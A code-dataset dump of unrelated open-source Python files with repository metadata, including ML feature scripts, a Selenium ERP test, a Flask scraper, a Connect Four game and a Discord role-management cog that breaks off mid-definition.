def add_user_feats(df, user_content_dict, user_timestamp_dict, user_prior_elapsed_dict,
user_part_dict, user_target_dict):
for idx, row in enumerate(tqdm(df[usecols].values)):
row_id = row[0]
user_id = row[1]
content_id = row[2]
timestamp = row[3]
prior_elapsed = row[4]
part = row[5]
target = row[6]
val_flg = row[7]
update_dict(user_id, user_content_dict, content_id)
update_dict(user_id, user_timestamp_dict, timestamp)
update_dict(user_id, user_prior_elapsed_dict, prior_elapsed)
update_dict(user_id, user_part_dict, part)
update_dict(user_id, user_target_dict, target)
if val_flg:
seq_list = [
user_content_dict[user_id][1:],
np.diff(user_timestamp_dict[user_id]),
user_prior_elapsed_dict[user_id][1:],
user_part_dict[user_id][1:],
user_target_dict[user_id][:-1],
]
save_seq(row_id, seq_list)
def get_features(df):
user_content_dict = {}
user_timestamp_dict = {}
user_prior_elapsed_dict = {}
user_part_dict = {}
user_target_dict = {}
add_user_feats(df, user_content_dict, user_timestamp_dict, user_prior_elapsed_dict,
user_part_dict, user_target_dict)
def update_dict(user_id, user_dict, v):
default_list = np.zeros(MAX_SEQ)
if user_id not in user_dict:
user_dict[user_id] = default_list.copy()
new_list = list(user_dict[user_id])
new_list.pop(0)
new_list.append(v)
user_dict[user_id] = np.array(new_list)
def save_seq(row_id, seq_list):
seq_dir = Path('../data/seq3')
if not seq_dir.exists():
seq_dir.mkdir(exist_ok=True)
dh.save(seq_dir / f'row_{int(row_id)}.pkl', seq_list)
def main():
train_df = pd.read_csv(const.INPUT_DATA_DIR / 'train.csv', dtype=const.DTYPE)
questions_df = pd.read_csv('../data/input/questions.csv')
q2p = dict(questions_df[['question_id', 'part']].values)
train_df['part'] = train_df['content_id'].map(q2p)
val_idx = np.load('../data/processed/cv1_valid.npy')
train_df['is_val'] = False
train_df.loc[val_idx, 'is_val'] = True
train_df = train_df[train_df['content_type_id'] == 0].reset_index(drop=True)
get_features(train_df)
if __name__ == '__main__':
main()
| [
"[email protected]"
] | |
7c05eb05c03dd44fb4a79fdfd9f7e41105cb9720 | 61fa932822d22ba480f7aa075573e688897ad844 | /simulation/decai/simulation/contract/classification/decision_tree.py | 0ff59590ed9e023aee0519c23a51d87e43c24768 | [
"MIT",
"LicenseRef-scancode-generic-cla"
] | permissive | microsoft/0xDeCA10B | a8f118fa1f89f387a0b83f297250fc1846521f41 | 4066eeb2b5298c259a7c19c4d42ca35ef22e0569 | refs/heads/main | 2023-07-26T08:09:34.718104 | 2023-01-25T12:47:17 | 2023-01-25T12:47:17 | 181,561,897 | 538 | 133 | MIT | 2023-07-19T03:10:38 | 2019-04-15T20:37:11 | Python | UTF-8 | Python | false | false | 588 | py | from skmultiflow.trees import HAT, RegressionHAT
from decai.simulation.contract.classification.scikit_classifier import SciKitClassifierModule
class DecisionTreeModule(SciKitClassifierModule):
def __init__(self, regression=False):
if regression:
model_initializer = lambda: RegressionHAT(
# leaf_prediction='mc'
)
else:
model_initializer = lambda: HAT(
# leaf_prediction='mc',
# nominal_attributes=[ 4],
)
super().__init__(_model_initializer=model_initializer)
| [
"[email protected]"
] | |
89082d3e6d1dd0e3be4f75bb4e0565e691c8fce5 | b3e81fa020ea2c02cbcce6f3ed0f623d08a9ce0c | /utils.py | fdcd46b65833241ed662083d03edba7cd08fb417 | [
"MIT"
] | permissive | giuscri/thesis | 646d5b2af6aee030ad415a0c0764e256925a5e38 | d7aa0a8476f53ad304495b437841af1a8d6c87d4 | refs/heads/master | 2022-12-16T16:34:45.978490 | 2018-09-12T09:01:31 | 2018-09-12T09:30:45 | 127,188,321 | 0 | 0 | MIT | 2022-12-08T02:50:27 | 2018-03-28T19:29:09 | Python | UTF-8 | Python | false | false | 613 | py | from binascii import hexlify
import os
import json
import pickle
def dump_pickle_to_file(obj, path):
dirname, basename = os.path.split(path)
os.makedirs(dirname, exist_ok=True)
with open(path, "wb") as f:
pickle.dump(obj, f)
def dump_json_to_file(obj, path):
dirname, basename = os.path.split(path)
os.makedirs(dirname, exist_ok=True)
with open(path, "w") as f:
json.dump(obj, f)
def load_pickle_from_file(path):
with open(path, "rb") as f:
return pickle.load(f)
def load_json_from_file(path):
with open(path, "r") as f:
return json.load(f)
| [
"[email protected]"
] | |
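
A quick round-trip through these helpers, showing that the dump functions create missing parent directories themselves; the tmp/ paths are arbitrary:

```python
# Assumes utils.py above is importable as `utils`.
import utils

obj = {"epsilon": 0.1, "labels": [0, 1, 7]}

utils.dump_json_to_file(obj, "tmp/example/params.json")  # creates tmp/example/
assert utils.load_json_from_file("tmp/example/params.json") == obj

utils.dump_pickle_to_file(obj, "tmp/example/params.pkl")
assert utils.load_pickle_from_file("tmp/example/params.pkl") == obj
```
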
0b1c79bb06a86728c774fc9376b0d475fba7ec11 | 1fcdccf5d651b60bfe906f2ddafd6745f4e29860 | /nufeeb.button/saleretail/lsopenCase.py | 45075fb2e5bd0553ddb5d2b63c49865ac25172d6 | [] | no_license | LimXS/workspace | 6728d6517a764ef2ac8d47fe784c4dba937a1f1d | 9669d653f4a7723947da645de526f4c580ddc88b | refs/heads/master | 2021-01-21T06:39:14.126933 | 2017-04-14T03:24:36 | 2017-04-14T03:24:36 | 83,257,374 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 11,875 | py | #*-* coding:UTF-8 *-*
import time
import re
import datetime
import unittest
import xml.dom.minidom
import traceback
import requests
import json
from common import browserClass
from selenium.webdriver.common.keys import Keys #the Keys package needs to be imported
browser=browserClass.browser()
class lsopenTest(unittest.TestCase):
    u'''Wholesale/Retail - retail order entry'''
def setUp(self):
self.driver=browser.startBrowser('chrome')
browser.set_up(self.driver)
cookie = [item["name"] + "=" + item["value"] for item in self.driver.get_cookies()]
#print cookie
self.cookiestr = ';'.join(item for item in cookie)
time.sleep(2)
pass
def tearDown(self):
print "test over"
self.driver.close()
pass
def testlsOpen(self):
        u'''Wholesale/Retail - retail order entry - regular goods'''
header={'cookie':self.cookiestr,"Content-Type": "application/json"}
comdom=xml.dom.minidom.parse(r'C:\workspace\nufeeb.button\data\commonlocation')
dom = xml.dom.minidom.parse(r'C:\workspace\nufeeb.button\saleretail\salelocation')
modulename=browser.xmlRead(dom,"module",0)
moduledetail=browser.xmlRead(dom,'moduledetail',7)
browser.openModule2(self.driver,modulename,moduledetail)
cookies=browser.cookieSave(self.driver)
header3={'cookie':cookies,"Content-Type": "application/json"}
header4={'cookie':cookies,"Content-Type": "application/x-www-form-urlencoded"}
        #page id
pageurl=browser.xmlRead(dom,"lsopenurl",0)
pageid=browser.getalertid(pageurl,header)
pageid=pageid[:-1]
#print pageid
#commid,id
commid=browser.getallcommonid(comdom)
#id=browser.getcommonid(dom)
try:
            #select a VIP member
selmenid=pageid+browser.xmlRead(dom,"btnSelectVipMember",0)
browser.delaytime(1)
browser.menbersel(self.driver,selmenid)
browser.delaytime(1)
browser.exjscommin(self.driver,"退出")
#选择套餐
selpackid=pageid+browser.xmlRead(dom,"btnSelectPTypeSuit",0)
browser.delaytime(1)
browser.itempacksel(self.driver,selpackid)
browser.delaytime(1)
browser.exjscommin(self.driver,"退出")
            #select a product
selitid=pageid+browser.xmlRead(dom,"btnSelectPType",0)
browser.delaytime(1)
browser.cateitemsel(self.driver,selitid,1)
            #membership card
menidcard=pageid+browser.xmlRead(dom,"mencard",0)
browser.findId(self.driver,menidcard).click()
browser.exjscommin(self.driver,"取消")
browser.findId(self.driver,menidcard).click()
browser.exjscommin(self.driver,"确定")
browser.exjscommin(self.driver,"关闭")
browser.findId(self.driver,menidcard).click()
js="$(\"input[id$=filter]\").attr(\"value\",\"vip2\")"
browser.delaytime(1)
browser.excutejs(self.driver,js)
browser.exjscommin(self.driver,"确定")
            #park the order (save as draft)
draftid=pageid+browser.xmlRead(dom,"btnSaveDraft",0)
browser.delaytime(1)
browser.findId(self.driver,draftid).click()
            #load a parked order
loadid=pageid+browser.xmlRead(dom,"btnLoadBill",0)
browser.delaytime(1)
browser.findId(self.driver,loadid).click()
browser.exjscommin(self.driver,"关闭")
browser.delaytime(2,self.driver)
browser.findId(self.driver,loadid).click()
browser.inputid(self.driver,"edDateScope","最近一周")
browser.exjscommin(self.driver,"查询")
browser.exjscommin(self.driver,"查看")
browser.exjscommin(self.driver,"返回")
browser.exjscommin(self.driver,"快速提单")
            #void the bill
clbillid=pageid+browser.xmlRead(dom,"btnClearBill",0)
browser.findId(self.driver,clbillid).click()
browser.accAlert(self.driver,1)
browser.accAlert(self.driver,0)
            #cash drawer configuration
posid=pageid+browser.xmlRead(dom,"btnPosConfig",0)
            #receipt printer configuration
priconid=pageid+browser.xmlRead(dom,"btnPrintConfig",0)
            #retail configuration
reid=pageid+browser.xmlRead(dom,"btnRetailConfig",0)
browser.findId(self.driver,reid).click()
browser.exjscommin(self.driver,"关闭")
browser.delaytime(1)
browser.findId(self.driver,reid).click()
browser.delaytime(2,self.driver)
js1="$(\"div[class=TabTopCaptionText]:contains('录帐')\").attr(\"id\",\"reaccid\")"
js2="$(\"div[class=TabTopCaptionText]:contains('抹零')\").attr(\"id\",\"zoreruleid\")"
js3="$(\"div[class=TabTopCaptionText]:contains('默认')\").attr(\"id\",\"slientruleid\")"
browser.delaytime(1)
browser.excutejs(self.driver,js1)
browser.excutejs(self.driver,js2)
browser.excutejs(self.driver,js3)
browser.delaytime(2,self.driver)
browser.findId(self.driver,"reaccid").click()
browser.findId(self.driver,"zoreruleid").click()
browser.findId(self.driver,"slientruleid").click()
jscate="$(\"input[id$=edKType]\").last().attr(\"id\",\"edKType\")"
jspeo="$(\"input[id$=edEType]\").last().attr(\"id\",\"edEType\")"
jscom="$(\"input[id$=edBType]\").last().attr(\"id\",\"edBType\")"
jsdep="$(\"input[id$=edDept]\").last().attr(\"id\",\"edDept\")"
jsstore="$(\"input[id$=edStore]\").last().attr(\"id\",\"edStore\")"
jspos="$(\"input[id$=edPos]\").last().attr(\"id\",\"edPos\")"
browser.delaytime(1)
browser.excutejs(self.driver,jscate)
browser.excutejs(self.driver,jspeo)
browser.excutejs(self.driver,jsdep)
browser.excutejs(self.driver,jsstore)
browser.excutejs(self.driver,jspos)
browser.excutejs(self.driver,jscom)
            #- warehouse
browser.peoplesel(self.driver,"edKType")
            #- handler
browser.peoplesel(self.driver,"edEType",1)
            #- purchasing unit
browser.buycompanysel(self.driver,"edBType")
            #- department
browser.passpeople(self.driver,"edDept")
            #- store
browser.doubleclick(self.driver,"edStore")
js="$(\"div:contains('mendiantest2')\").last().attr(\"id\",\"selmendian\")"
browser.delaytime(1)
browser.excutejs(self.driver,js)
browser.findId(self.driver,"selmendian").click()
            #- cash register
browser.doubleclick(self.driver,"edPos")
js="$(\"div:contains('md2cashd2')\").last().attr(\"id\",\"possel\")"
browser.delaytime(1)
browser.excutejs(self.driver,js)
browser.findId(self.driver,"possel").click()
browser.exjscommin(self.driver,"保存")
browser.accAlert(self.driver,1)
            #hotkey configuration
hotid=pageid+browser.xmlRead(dom,"btnHotkeyConfig",0)
browser.findId(self.driver,hotid).click()
browser.exjscommin(self.driver,"关闭")
            #product name
browser.findId(self.driver,selitid).click()
browser.exjscommin(self.driver,"选中")
            #quantity
jsnum="$(\"div[class=GridBodyCellText]:contains('1')\").eq(1).attr(\"id\",\"numid\")"
browser.delaytime(1)
browser.excutejs(self.driver,jsnum)
browser.doubleclick(self.driver,"numid")
browser.exjscommin(self.driver,"取消")
browser.doubleclick(self.driver,"numid")
browser.delaytime(2,self.driver)
js="$(\"input[id$=edDecimal]\").last().val('2')"
browser.delaytime(1)
browser.excutejs(self.driver,js)
browser.exjscommin(self.driver,"确定")
            #unit price
jsprice="$(\"div[class=GridBodyCellText]:contains('29.5')\").first().attr(\"id\",\"pricid\")"
browser.delaytime(1)
browser.excutejs(self.driver,jsprice)
browser.doubleclick(self.driver,"pricid")
browser.exjscommin(self.driver,"取消")
browser.doubleclick(self.driver,"pricid")
js="$(\"input[id$=edDecimal]\").last().val('31.5')"
browser.delaytime(1)
browser.excutejs(self.driver,js)
browser.exjscommin(self.driver,"确定")
            #discount
jsdis="$(\"div[class=GridBodyCellText]:contains('1')\").last().attr(\"id\",\"disid\")"
browser.delaytime(1)
browser.excutejs(self.driver,jsdis)
browser.doubleclick(self.driver,"disid")
browser.exjscommin(self.driver,"取消")
browser.doubleclick(self.driver,"disid")
js="$(\"input[id$=edDecimal]\").last().val('0.9')"
browser.delaytime(1)
browser.excutejs(self.driver,js)
browser.exjscommin(self.driver,"确定")
            #handler
peoid=pageid+browser.xmlRead(dom,'edEType',0)
browser.peoplesel(self.driver,peoid,1)
            #department
depid=pageid+browser.xmlRead(dom,'edDept',0)
browser.passpeople(self.driver,depid)
            #purchasing unit
companyid=pageid+browser.xmlRead(dom,'edBType',0)
#print companyid
browser.delaytime(1,self.driver)
browser.buycompanysel(self.driver,companyid)
browser.excutejs(self.driver,jsstore)
browser.excutejs(self.driver,jspos)
            #store
browser.doubleclick(self.driver,"edStore")
js="$(\"div:contains('mendiantest2')\").last().attr(\"id\",\"selmendian\")"
browser.delaytime(1)
browser.excutejs(self.driver,js)
browser.findId(self.driver,"selmendian").click()
            #cash register
browser.doubleclick(self.driver,"edPos")
js="$(\"div:contains('md2cashd2')\").last().attr(\"id\",\"possel\")"
browser.delaytime(1)
browser.excutejs(self.driver,js)
browser.findId(self.driver,"possel").click()
            #checkout
accend=pageid+commid["btnSave"]
browser.findId(self.driver,accend).click()
            #- cancel
browser.exjscommin(self.driver,"取消")
browser.findId(self.driver,accend).click()
            #- multi-account selection
browser.exjscommin(self.driver,"多账户选择")
browser.exjscommin(self.driver,"取消")
browser.exjscommin(self.driver,"多账户选择")
browser.exjscommin(self.driver,"确定")
            #- master data - cash/bank
browser.exjscommin(self.driver,"现金银行")
browser.exjscommin(self.driver,"退出")
browser.findId(self.driver,accend).click()
            #- amount actually received
js="$(\"input[id$=edReciveMoney]\").val('100')"
browser.delaytime(1)
browser.excutejs(self.driver,js)
            #- finish settlement
browser.exjscommin(self.driver,"结算完成")
browser.findId(self.driver,selitid).click()
browser.exjscommin(self.driver,"关闭")
except:
print traceback.format_exc()
filename=browser.xmlRead(dom,'filename',0)
#print filename+u"常用-单据草稿.png"
#browser.getpicture(self.driver,filename+u"notedraft.png")
browser.getpicture(self.driver,filename+u"批零-零售开单-普通商品.png")
if __name__ == "__main__":
#import sys;sys.argv = ['', 'Test.testName']
unittest.main()
| [
"[email protected]"
] | |
21ee07fe52e52478946e1a03a80f3566414aa362 | ace048167cf70307096efbc82e75ebe19aadee5a | /testNeuralNetDigits.py | 5fe6914fecc34e02ff12037ce930da31c9a37910 | [] | no_license | devstein/Neural-Net-Practice | 181cd189e6cb9ded6c83c2ad04e0e53b91e6cdf1 | 3f8c87563e47ce5badfc70ad0824703730e600b5 | refs/heads/master | 2020-07-05T17:53:32.835701 | 2016-11-17T18:19:42 | 2016-11-17T18:19:42 | 73,987,428 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 1,141 | py | #test file
import numpy as np
from nn import NeuralNet
from sklearn.linear_model import Ridge
from sklearn.preprocessing import PolynomialFeatures
from sklearn.pipeline import make_pipeline
from sklearn.metrics import accuracy_score
# load the data
filePathX = "data/digitsX.dat"
file = open(filePathX,'r')
allDataX = np.loadtxt(file, delimiter=',')
X = allDataX
filePathY = "data/digitsY.dat"
file = open(filePathY,'r')
allDataY = np.loadtxt(file)
y = allDataY
# print "X Data Shape:",X.shape
# print "Y Data shape:",y.shape
# X = np.array([[1,2,3,4,5,6,7], [4,4,4,5,5,5,6], [9,8,7,6,5,4,3], [4,1,9,5,8,3,6]])
# X = np.array([[1,2,3,4,5], [4,4,4,5,5], [9,8,7,6,5], [4,8,9,2,3], [7,2,6,3,8]])
# y = np.array([2,5,8,2,7])
layers = np.array([25])
modelNets = NeuralNet(layers, learningRate = 3, numEpochs = 1000, epsilon = 0.5)
modelNets.fit(X, y)
# output predictions on the remaining data
ypred_Nets = modelNets.predict(X)
# compute the training accuracy of the model
accuracyNets = accuracy_score(y, ypred_Nets)
print "Neural Nets Accuracy = "+str(accuracyNets)
filen = "Hidden_Layers.bmp"
modelNets.visualizeHiddenNodes(filen) | [
"[email protected]"
] | |
e31de4e1a953c594960c72cca77dfcc7ee6d890e | afe2e9c6ba965cfdada92d32d5152af360807093 | /pipeline/transformers.py | 78074b0f7c7ab338858d6005bcadeee252b01d76 | [
"MIT"
] | permissive | VanAurum/gcp-dataflow-stream | e0b6244e51f37100842d9ba584d35c683cd6deaf | f0744e2afb2b1cad434cea737e7c33da0f9c6f84 | refs/heads/master | 2022-12-14T17:10:44.814655 | 2019-06-18T17:35:00 | 2019-06-18T17:35:00 | 192,386,670 | 0 | 0 | MIT | 2022-12-08T05:48:37 | 2019-06-17T17:01:13 | Python | UTF-8 | Python | false | false | 355 | py | import datetime
import itertools
import apache_beam as beam
class AddTimestampDoFn(beam.DoFn):
def process(self, element, *args, **kwargs):
trade_date = element.split(',')[0]
unix_timestamp = int(datetime.datetime.strptime(trade_date, '%Y/%m/%d').strftime("%s"))
yield beam.window.TimestampedValue(element, unix_timestamp) | [
"[email protected]"
] | |
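
AddTimestampDoFn moves each CSV row onto Beam's event-time axis by parsing the leading date field. A minimal sketch of wiring it into a pipeline with daily fixed windows; the 'YYYY/MM/DD,value' element format matches what the DoFn expects, everything else here is illustrative (note that the DoFn's strftime("%s") is platform-dependent):

```python
# Illustrative pipeline: stamp elements with event time, then window by day.
import apache_beam as beam

with beam.Pipeline() as p:
    (
        p
        | beam.Create(["2019/06/17,101.5", "2019/06/18,102.0"])
        | beam.ParDo(AddTimestampDoFn())  # the DoFn defined above
        | beam.WindowInto(beam.window.FixedWindows(24 * 60 * 60))
        | beam.Map(print)
    )
```
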
7334cf72d2a6bdde3a8ab9efe2cb794cd7675292 | 8e1d7419682a4cb821a7268ed14964e4da9888bd | /TestGroupLib/UnitTestGroup/ArduPlaneTestGroup/CalibrationTestGroup.py | 18aadf26acb15b30eaa7e6a69467f81fca93cdb3 | [] | no_license | sycomix/arsenl-testing | 0f641ead503734e582ae020c4786c86aba49dac2 | 8e3bde0af270179ec1b0d07fc6b811691adeed56 | refs/heads/master | 2020-03-22T02:16:24.570991 | 2014-08-08T20:23:10 | 2014-08-08T20:23:10 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 304 | py | import pexpect, os, sys
from pymavlink import mavutil
import util, arduplane
from common import *
class CalibrationTest():
def test_calibrate_barometer(self):
self.mavproxy.send('calpress\n')
assert {0:True, 1:False}[self.mavproxy.expect('barometer calibration complete',timeout=self.TIMEOUT)]
| [
"[email protected]"
] | |
1fbb6a4b9b19c76fe9eef4fe0b2aacea5faa1801 | ca1528083f0c3bf368d68101c28248c1d55a105e | /connect_four_console.py | 9a69049f9a58df7bf68bf985c2af97bcf811b2d3 | [] | no_license | pairut76/connect_four | 15446db4624f735f6bcaf724f94e1479e0e368bc | 2d2b9368f4cb097c4a80de1061e85b931d5626fc | refs/heads/master | 2021-01-12T03:37:51.235473 | 2017-01-06T21:55:53 | 2017-01-06T21:55:53 | 78,241,702 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,511 | py | import connectfour
def mainsingle():
"""this is the main function frame that operate in the single player status"""
ConnectFourGameState=connectfour.new_game_state()
print('Game start!\n')
printboard(ConnectFourGameState)
print("Enter your move(for example, 'DROP column#' or 'POP column#'\n")
while True:
#check if there is a winner
winnernum=connectfour.winning_player(ConnectFourGameState)
if winnernum== connectfour.NONE:
if not checkboard(ConnectFourGameState):
while True:
if ConnectFourGameState[1]==int(1):
print("Red turn.")
elif ConnectFourGameState[1]==int(2):
print("Yellow turn.")
try:
originalcommand=input("Enter your move: ")
order,colnum=command(originalcommand)
if (order=='POP' or order=='pop') or (order=='DROP' or order=='drop'):
break
else:
print("\nInput format error (must be 'DROP column#' or 'POP column#')\n")
except:
print("\nInput format error (must be 'DROP column#' or 'POP column#')\n")
if order=='DROP' or order=='drop':
try:
ConnectFourGameState=connectfour.drop_piece(ConnectFourGameState, colnum-1)
except connectfour.InvalidMoveError:
print('\nSorry, this column is already full\n')
if order=='POP' or order=='pop':
try:
ConnectFourGameState=connectfour.pop_piece(ConnectFourGameState, colnum-1)
except connectfour.InvalidMoveError:
print('\nSorry, this column is empty\n')
printboard(ConnectFourGameState)
else:
print('\nThe board is already full, no winner.\n')
return
else:
break
printwinner(winnernum)
def command(command: str)->"order, column number":
commandlist=command.split()
order=commandlist[0]
colnum=int(commandlist[1])
return order, int(colnum)
def printboard(ConnectFourGameState):
"""print the board of the current state"""
for colnum in range(connectfour.BOARD_COLUMNS):
print(colnum+1, end=' ')
for rownum in range(connectfour.BOARD_ROWS):
print('')
for colnum in range(connectfour.BOARD_COLUMNS):
if ConnectFourGameState.board[colnum][rownum]==0:
print('. ',end='')
elif ConnectFourGameState.board[colnum][rownum]==1:
print('R ',end='')
else:
print('Y ',end='')
print('')
def printwinner(winnernum):
"""translate the number of player to color it represents"""
if winnernum==1:
print('The game is over! The winner is', ' RED')
else:
print('The game is over! The winner is', ' YELLOW')
def checkboard(ConnectFourGameState):
"""check if the board is all full"""
for onelist in ConnectFourGameState.board:
if 0 in onelist:
return False
else:
pass
return True
mainsingle()
| [
"[email protected]"
] | |
72591a8aef9f9b4b397105543d072e59b973b2c0 | 29620056ef2401e78aa0b45a22035a2e4dcea7e2 | /week4/projects/alonememo/app.py | 09c6ffc65a02719713e6a8abd109f55d0d23cab2 | [] | no_license | 51527/sparta | 52dc3d8886dc330cebc0015618c1074343a173ac | 938cc94d4c06e770a2f0949694d9edd3f660a982 | refs/heads/master | 2022-11-15T06:56:10.827569 | 2020-06-19T21:24:38 | 2020-06-19T21:24:38 | 267,468,287 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,915 | py | from flask import Flask, render_template, jsonify, request
app = Flask(__name__)
import requests
from bs4 import BeautifulSoup
from pymongo import MongoClient # import pymongo (the package has to be installed first, of course)
client = MongoClient('localhost', 27017) # MongoDB runs on port 27017.
db = client.dbsparta # create a db named 'dbsparta'.
## the part that serves the HTML
@app.route('/')
def home():
return render_template('index.html')
@app.route('/memo', methods=['GET'])
def listing():
    # 1. Find all documents & exclude the _id field from the output
    # 2. Send the records down under the key 'articles'
all_articles = list(db.articles.find({}, {'_id':0}))
return jsonify({'result':'success', 'articles':all_articles})
## the part that acts as the API
@app.route('/memo', methods=['POST'])
def saving():
    # 1. Receive the data from the client
    # 2. Scrape the meta tags
    # 3. Insert the data into MongoDB
url_receive = request.form['url_give']
comment_receive = request.form['comment_give']
headers = {'User-Agent' : 'Mozilla/5.0 (Windows NT 10.0; Win64; x64)AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.86 Safari/537.36'}
data = requests.get(url_receive,headers=headers)
soup = BeautifulSoup(data.text, 'html.parser')
title = soup.select_one('meta[property="og:title"]')['content']
image = soup.select_one('meta[property="og:image"]')['content']
desc = soup.select_one('meta[property="og:description"]')['content']
doc = {
'title': title,
'image': image,
'url': url_receive,
'comment': comment_receive,
'desc': desc
}
db.articles.insert_one(doc)
return jsonify({'result': 'success', 'msg':'저장!'})
if __name__ == '__main__':
app.run('0.0.0.0',port=5000,debug=True) | [
"[email protected]"
] | |
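
Once app.py is running, its two /memo endpoints can be exercised from another process; a hedged client sketch whose base URL mirrors app.run above (the article URL is only an example and must expose og: meta tags, or the server's scraping will fail):

```python
# Minimal client for the /memo API defined above.
import requests

BASE = "http://localhost:5000"

# Save a memo; the server itself scrapes og:title / og:image / og:description.
requests.post(BASE + "/memo", data={
    "url_give": "https://example.com/some-article",  # must have og: meta tags
    "comment_give": "test comment",
})

# List every saved memo.
print(requests.get(BASE + "/memo").json()["articles"])
```
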
4f565b06a8882c6c2be3c926f27c1c26aad93c70 | d0e2e0f08c789c3aba44e3f29f2e2b35e231be6d | /cogs/Roles.py | 95438ac70d12438e4f5899d03f6a9ef6835eb392 | [] | no_license | Developing-Studio/ci-Spark-Bot | 04f18f1b475ce1ae9962b7e8133858b831c44180 | 470f25ad6d95a42f4d6089a3073efe00175e82b7 | refs/heads/master | 2022-12-03T21:02:56.986766 | 2020-08-25T00:50:44 | 2020-08-25T00:50:44 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 11,666 | py | #•----------Modules----------•#
import discord
from discord.ext.commands import command, Cog, guild_only, has_permissions, bot_has_permissions, BadArgument
import asyncio
from datetime import datetime
import typing
from typing import Union
#•----------Commands----------•#
class Role(Cog, name="Role Management"):
"""😱 `{Commands for Managing Roles}`"""
def __init__(self, bot):
self.bot = bot
@command(
name="roleposition",
brief="{Change the Position of a Role}",
usage="roleposition <#position>") #usage="{Change the position of a Role}")
@guild_only()
@has_permissions(manage_roles=True)
@bot_has_permissions(manage_roles=True)
async def position(self, ctx, role: discord.Role, *, position: int):
        #Move the role to the requested position in the hierarchy
        await role.edit(position=position)
        await ctx.send(f"Successfully moved `{role.name}` to position {position}")
@command(
name="rolename",
brief="{Change the Name of a Role}",
usage="rolename <role> <new_name>")#description="{Change the name of a Role}")
@guild_only()
@bot_has_permissions(manage_roles=True)
@has_permissions(manage_roles=True)
async def name(self, ctx, role: discord.Role, *, name=None):
#If user doesn't give a new name
if name is None:
await ctx.send("You have to give this role a name")
return
#If they give a name
elif name is not None:
rolename = role.name
#Edit the role
await role.edit(name=name)
e = discord.Embed(
description=f"**Successfully changed {rolename} to {name}**")
e.timestamp = datetime.utcnow()
await ctx.send(embed=e)
@name.error
async def name_error(self, ctx, error):
if isinstance(error, BadArgument):
e = discord.Embed(
color=discord.Color.dark_red(),
description=f'Either:\n• Role wasn\'t found\n• Roles including spaces must be surrounded with `"<role name"``\n• Valid Syntax: `{ctx.prefix}rolename <new_name> <role_name>`')
e.timestamp = datetime.utcnow()
await ctx.send(embed=e)
@command(
name="rolecolor",
brief="{Change the color of a Role}",
usage="rolecolor <color> <role_name>")
@guild_only()
@has_permissions(manage_roles=True)
@bot_has_permissions(manage_roles=True)
async def color(self, ctx, color: discord.Color, *, role: discord.Role):
if not color:
await ctx.send("You gotta give a new color for the role")
return
#If they do give a color
if color:
#Make a few helpful variables
rolecolor = role.color
rolemention = role.mention
#Edit the role
await role.edit(color=color)
#Make and send embed
e = discord.Embed(
description=f"Successfully changed colors for {rolemention}{{`{rolecolor}`}} to {{`{color}`}}")
e.timestamp = datetime.utcnow()
await ctx.send(embed=e)
@color.error
async def color_error(self, ctx, error):
if isinstance(error, BadArgument):
e = discord.Embed(
color=discord.Color.dark_red(),
description=f'Either:\n• Role wasn\'t found\n• Roles including spaces must be surrounded with `"<role_name>"`\n• Valid Syntax: `{ctx.prefix}role color <color> <role_name>`')
e.timestamp = datetime.utcnow()
await ctx.send(embed=e)
@command(
name="addrole",
brief="{Add a Role to a Member}",
usage="addrole <member> <role>")
@guild_only()
@has_permissions(manage_roles=True)
@bot_has_permissions(manage_roles=True)
async def add(self, ctx, member: discord.Member, *, role: discord.Role):
await member.add_roles(role)
await ctx.send(f"Successfully gave {role.mention} to: `{member}`")
@add.error
async def add_error(self, ctx, error):
if isinstance(error, BadArgument):
e = discord.Embed(
color=discord.Color.dark_red(),
description=f'Either:\n• Role wasn\'t found\n• Roles including spaces must be surrounded with `"role_name"`\n• Valid Syntax: `{ctx.prefix}addrole <member> <role_name>`')
e.timestamp = datetime.utcnow()
await ctx.send(embed=e)
@command(
name="removerole",
brief="{Remove a Role from a Member}",
usage="removerole <member> <role_name>",
aliases=['roleremove', 'rremove'])
@guild_only()
@has_permissions(manage_roles=True)
@bot_has_permissions(manage_roles=True)
async def remove(self, ctx, member: discord.Member, *, role: discord.Role):
#Remove role from member
await member.remove_roles(role)
await ctx.send(f"Successfully removed {role.mention} from: `{member}`")
@remove.error
async def remove_error(self, ctx, error):
if isinstance(error, BadArgument):
e = discord.Embed(
color=discord.Color.dark_red(),
description=f'Either:\n• Role wasn\'t found\n• Roles including spaces must be surrounded with `"<role_name>"`\n• Valid Syntax: `{ctx.prefix}role remove <member> <role_name>`')
e.timestamp = datetime.utcnow()
await ctx.send(embed=e)
@command(
name="roleinfo",
brief="{Get Info on a Role}",
usage="roleinfo <role>",
aliases=['ri', 'rinfo'])
@guild_only()
async def info(self, ctx, *, role: discord.Role):
#See when the role was created
role_created = f"{role.created_at.strftime('%a/%b %d/%Y • %I:%M %p')}"
#List number of non-bots
humans = len(list(filter(lambda h: not h.bot, role.members)))
#List number of bots
bots = len(list(filter(lambda b: b.bot, role.members)))
#If there is more than 15 members
if len(role.members) > 25:
length = len(role.members) - 25
human_list = f"{' , '.join(map(str, (member.mention for member in list(reversed(role.members))[:25])))} and **{length}** more"
#If there is less than 25 members
else:
human_list = f"{' , '.join(map(str, (member.mention for member in (list(reversed(role.members[1:]))))))}"
#If there is no members
human_lt = "No Members" if human_list == "" else human_list
#Custom emojis
check = "<:greenmark:738415677827973152>"
x = "<:redmark:738415723172462723>"
#Using emojis from above
#To show any bools
            mentionable = check if role.mentionable else x
hoisted = check if role.hoist else x
e = discord.Embed(
description=f"**General Info for {role.mention} {{Color In Hex > {role.color}}}**")
#Make fields
fields = [("ID", role.id, True),
("Misc",
f"\nMentionable? {mentionable}" +
f"\nDisplays from Others? {hoisted}", True),
("Position", role.position, True),
(f"Members w/{role.name} {{{len(role.members)}}}",
f"\nHumans: {humans}" +
f"\nBots: {bots}", False),
(f"List of Members with this Role", human_lt, False)]
#Show when role was created
e.set_footer(
text=f"Role Created At | {role_created}")
e.set_author(
name=f"Requested by {ctx.author}",
icon_url=ctx.author.avatar_url)
#Add fields
for name, val, inl in fields:
e.add_field(
name=name,
value=val,
inline=inl)
await ctx.send(embed=e)
@info.error
async def info_error(self, ctx, error):
if isinstance(error, BadArgument):
await ctx.send("That isn't a valid role")
@command(
name="rolelist",
